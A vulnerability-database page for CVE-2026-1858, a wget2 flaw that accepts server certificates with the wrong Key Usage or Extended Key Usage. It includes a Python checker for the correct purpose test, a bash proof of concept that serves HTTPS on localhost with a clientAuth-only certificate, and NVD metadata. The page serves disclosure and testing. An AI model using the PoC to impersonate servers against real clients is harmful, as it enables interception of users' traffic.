Security Vulnerability Report
CVE-2026-1858 CVSS 4.8 MEDIUM

CVE-2026-1858

Published: 2026-04-29 21:16:21
Last Modified: 2026-05-05 02:47:29

Description

wget2 accepts a server certificate with incorrect Key Usage (KU) or Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.
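The check a TLS client has to make before trusting a server certificate, and which the description above says wget2 skips, as an added example (not wget2 code and not the page's PoC): walk the certificate's extensions, decode KeyUsage and ExtendedKeyUsage, and refuse the certificate unless KU (if present) permits signing or key exchange and EKU (if present) contains id-kp-serverAuth or anyExtendedKeyUsage. It uses only the Python standard library with a minimal DER reader; the certificates it checks are constructed inline by `fake_certificate`, which emits a Certificate-shaped structure with placeholder fields and is not a real, signed certificate. OIDs and KU bit positions are the RFC 5280 values.

```python
"""Purpose check for a TLS server certificate (KU/EKU), stdlib only."""

OID_KEY_USAGE = "2.5.29.15"
OID_EXT_KEY_USAGE = "2.5.29.37"
OID_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_ANY_EKU = "2.5.29.37.0"
# KeyUsage bit positions from RFC 5280 4.2.1.3
KU_DIGITAL_SIGNATURE, KU_KEY_ENCIPHERMENT, KU_KEY_AGREEMENT = 0, 2, 4


# --- minimal DER reader ---------------------------------------------------
def der_read(buf, pos=0):
    """Return (tag, contents, next_pos) for the TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def der_children(contents):
    """Split the contents of a constructed TLV into (tag, contents) pairs."""
    out, pos = [], 0
    while pos < len(contents):
        tag, val, pos = der_read(contents, pos)
        out.append((tag, val))
    return out


def decode_oid(value):
    parts, acc = [str(value[0] // 40), str(value[0] % 40)], 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(str(acc))
            acc = 0
    return ".".join(parts)


def ku_bits(bitstring):
    """Decode a KeyUsage BIT STRING into the set of bit positions that are set."""
    unused, body = bitstring[0], bitstring[1:]
    return {i for i in range(len(body) * 8 - unused) if body[i // 8] & (0x80 >> (i % 8))}


def certificate_extensions(cert_der):
    """Walk Certificate -> tbsCertificate -> extensions [3]; yield (oid, extnValue)."""
    _, cert, _ = der_read(cert_der)
    _, tbs, _ = der_read(cert)
    for tag, val in der_children(tbs):
        if tag == 0xA3:  # [3] EXPLICIT Extensions
            _, ext_seq, _ = der_read(val)
            for _, ext in der_children(ext_seq):
                fields = der_children(ext)  # OID, optional BOOLEAN critical, OCTET STRING
                yield decode_oid(fields[0][1]), fields[-1][1]
            return


def server_cert_purpose_ok(cert_der):
    """Return (ok, reason). This is the check a client must not skip."""
    for oid, octets in certificate_extensions(cert_der):
        if oid == OID_KEY_USAGE:
            _, bitstring, _ = der_read(octets)
            # RSA key transport needs keyEncipherment; (EC)DHE needs digitalSignature
            # to sign the handshake; static DH needs keyAgreement.
            if not ku_bits(bitstring) & {KU_DIGITAL_SIGNATURE, KU_KEY_ENCIPHERMENT, KU_KEY_AGREEMENT}:
                return False, "keyUsage forbids both signing and key exchange"
        elif oid == OID_EXT_KEY_USAGE:
            _, eku_seq, _ = der_read(octets)
            purposes = {decode_oid(v) for _, v in der_children(eku_seq)}
            if not purposes & {OID_SERVER_AUTH, OID_ANY_EKU}:
                return False, "extendedKeyUsage lacks id-kp-serverAuth"
    return True, "usable for TLS server authentication"


# --- DER encoders, used only to build the constructed sample certificates ---
def der(tag, content):
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def encode_oid(oid):
    arcs = [int(a) for a in oid.split(".")]
    body = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        body += chunk
    return der(0x06, bytes(body))


def encode_ku(bits):
    byte = 0
    for b in bits:
        byte |= 0x80 >> b
    if byte == 0:
        return der(0x03, b"\x00")
    unused = (byte & -byte).bit_length() - 1  # trailing zero bits, as DER requires
    return der(0x03, bytes([unused, byte]))


def fake_certificate(ku=None, eku=None):
    """Constructed, Certificate-shaped DER with placeholder fields: NOT a valid certificate."""
    exts = b""
    if ku is not None:
        exts += der(0x30, encode_oid(OID_KEY_USAGE) + der(0x01, b"\xff") + der(0x04, encode_ku(ku)))
    if eku is not None:
        exts += der(0x30, encode_oid(OID_EXT_KEY_USAGE) + der(0x04, der(0x30, b"".join(map(encode_oid, eku)))))
    placeholder = der(0x30, b"")  # stands in for signature, issuer, validity, subject, spki
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01") + placeholder * 5
              + der(0xA3, der(0x30, exts)))
    return der(0x30, tbs + placeholder + der(0x03, b"\x00"))


if __name__ == "__main__":
    print("serverAuth:", server_cert_purpose_ok(fake_certificate({0, 2}, [OID_SERVER_AUTH])))
    print("clientAuth:", server_cert_purpose_ok(fake_certificate({0, 2}, [OID_CLIENT_AUTH])))
```

The second call is the CVE scenario: a certificate whose only listed purpose is client authentication, presented by a TLS server. A certificate with no KU and no EKU extension at all is accepted, because RFC 5280 makes both extensions optional and their absence imposes no restriction; the bug is accepting a certificate that carries an extension which excludes server use.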

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:* - VULNERABLE
wget2 <= 2.2.1 (per the NVD configuration in the raw JSON below, versionEndIncluding 2.2.1; consult the official advisory for the fixed release)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-1858: wget2 Incorrect Key Usage Acceptance
# Generates a certificate whose EKU is 'clientAuth' (not 'serverAuth') and starts a
# test HTTPS server with it. A correct client must reject this certificate even when
# its issuer is trusted; a vulnerable wget2 connects anyway, which confirms the bug.
set -e

# 1. Generate private key
openssl genrsa -out malicious.key 2048

# 2. OpenSSL config. Subject and SAN are 'localhost' so the hostname check passes and
#    only the purpose check is under test. 'x509_extensions' (not 'req_extensions')
#    is what 'openssl req -x509' reads when emitting a self-signed certificate.
cat > malicious.cnf <<EOF
[req]
prompt = no
distinguished_name = req_distinguished_name
x509_extensions = v3_req
[req_distinguished_name]
commonName = localhost
[v3_req]
subjectAltName = DNS:localhost
keyUsage = digitalSignature, keyEncipherment
# Incorrect EKU for a server
extendedKeyUsage = clientAuth
EOF

# 3. Generate self-signed certificate and confirm the EKU really is clientAuth only
openssl req -new -x509 -key malicious.key -out malicious.crt -days 365 -config malicious.cnf
openssl x509 -in malicious.crt -noout -ext extendedKeyUsage

# 4. Start a simple HTTPS server using the malicious cert (Python 3)
echo "Starting malicious server on port 8443..."
python3 - <<'PY_SCRIPT'
import http.server
import ssl
import socketserver

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain('malicious.crt', 'malicious.key')
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(('0.0.0.0', 8443), http.server.SimpleHTTPRequestHandler)
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
print("Server running. Trust the test cert explicitly so only the purpose check is exercised:")
print("  wget2 --ca-certificate=malicious.crt https://localhost:8443/")
print("A fixed client fails the handshake (wrong EKU); a vulnerable wget2 downloads the page.")
print("Do NOT pass --no-check-certificate: it disables verification entirely and proves nothing.")
httpd.serve_forever()
PY_SCRIPT

References

https://www.tenable.com/security/research/tra-2026-37 (Exploit, Third Party Advisory)

Weakness: CWE-20 (Improper Input Validation)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1858", "sourceIdentifier": "[email protected]", "published": "2026-04-29T21:16:20.513", "lastModified": "2026-05-05T02:47:29.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wget2 accepts a server certificate with incorrect Key Usage (KU) or Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.2.1", "matchCriteriaId": "7059A7C4-12BD-4BA5-B6A7-642161B8DDA2"}]}]}], "references": [{"url": "https://www.tenable.com/security/research/tra-2026-37", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}